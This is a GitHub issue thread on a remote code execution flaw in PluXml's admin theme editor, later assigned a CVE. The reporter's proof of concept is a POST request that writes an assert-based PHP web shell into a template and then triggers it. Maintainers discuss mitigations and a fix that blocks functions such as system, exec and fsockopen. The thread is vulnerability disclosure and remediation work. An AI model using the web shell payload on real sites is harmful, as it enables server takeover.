Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

An issue in the theme edit function #320

Closed
jadacheng opened this issue Feb 17, 2019 · 7 comments
Closed

An issue in the theme edit function #320

jadacheng opened this issue Feb 17, 2019 · 7 comments
Assignees
@haruka-7 @bazooka07
Labels
bug

Comments

@jadacheng
Copy link

The theme edit function /PluXml/core/admin/parametres_edittpl.php allows remote attackers to execute arbitrary PHP code by placing this code into a template.

Poc:
/PluXml/core/admin/parametres_edittpl.php [POST]token=603b37bed4a91d8b18a3507c46ae27df644a2ff4&template=%2Ftags.php&submit=Save+the+file&tpl=%2Ftags.php&content=%3C%3Fphp+assert%28%24_REQUEST%5B%27c%27%5D%29%3B%3F%3E%0D%0A
image

then visit /PluXml/themes/defaut/tags.php?c=phpinfo();

image
@haruka-7
Copy link
Collaborator

Hello,
I confirm this vulnerability. What's your recommandation ? Using an XSS filter ?
Thanks for help.

@haruka-7 haruka-7 self-assigned this Feb 26, 2019
@haruka-7 haruka-7 added the bug label Feb 26, 2019
@bazooka07
Copy link
Collaborator

You can disable the assert evaluation in php.ini.
I have Ubuntu Bionic 18.04.2 and your code does not work.
Display phpinfo and look for assert. I have "zend.assertions" equals -1 for local and global values.

@jerrywham
Copy link
Contributor 

assert_options(ASSERT_ACTIVE,false);

dans le début du fichier index.php ?

@jerrywham
Copy link
Contributor

Des news ?

@jadacheng
Copy link
Author

In fact, I think it’s not a good idea for webadmin to be able to edit .php file directly.
Filtering is never enough
If you really need this feature.
Ignore this problem
or
verify that webadmin is a system administrator.

@setharnold
Copy link

Hello, it appears CVE-2020-18184 has been assigned to this issue. However, the documentation seems to include a lot of instructions for how to execute arbitrary code in themes:

Le moteur de plugin de PluXml repose sur un système de hooks (« crochets » en français) permettant d’injecter du code php, html, javascript dans celui de PluXml.

https://wiki.pluxml.org/developper/developpement/

The examples even make extensive use of eval, which suggests to me that the feature is intended to allow administrators to execute anything they want any time they want.

Is this working as intended?

Thanks

@bazooka07 bazooka07 self-assigned this Dec 13, 2022
@bazooka07
Copy link
Collaborator

A new function plxUtils::sanitizePhp is added to PluXml
The value for content field is checked with this function.
It comments critical functions in PHP script like : fsockopen, proc_open, system, exec, chroot, shell_exec,socket
See PR#589

Of course, it's better to disable these critical function in php.ini.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@haruka-7 haruka-7

@bazooka07 bazooka07

Labels
bug
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
5 participants
@haruka-7 @jerrywham @bazooka07 @setharnold @jadacheng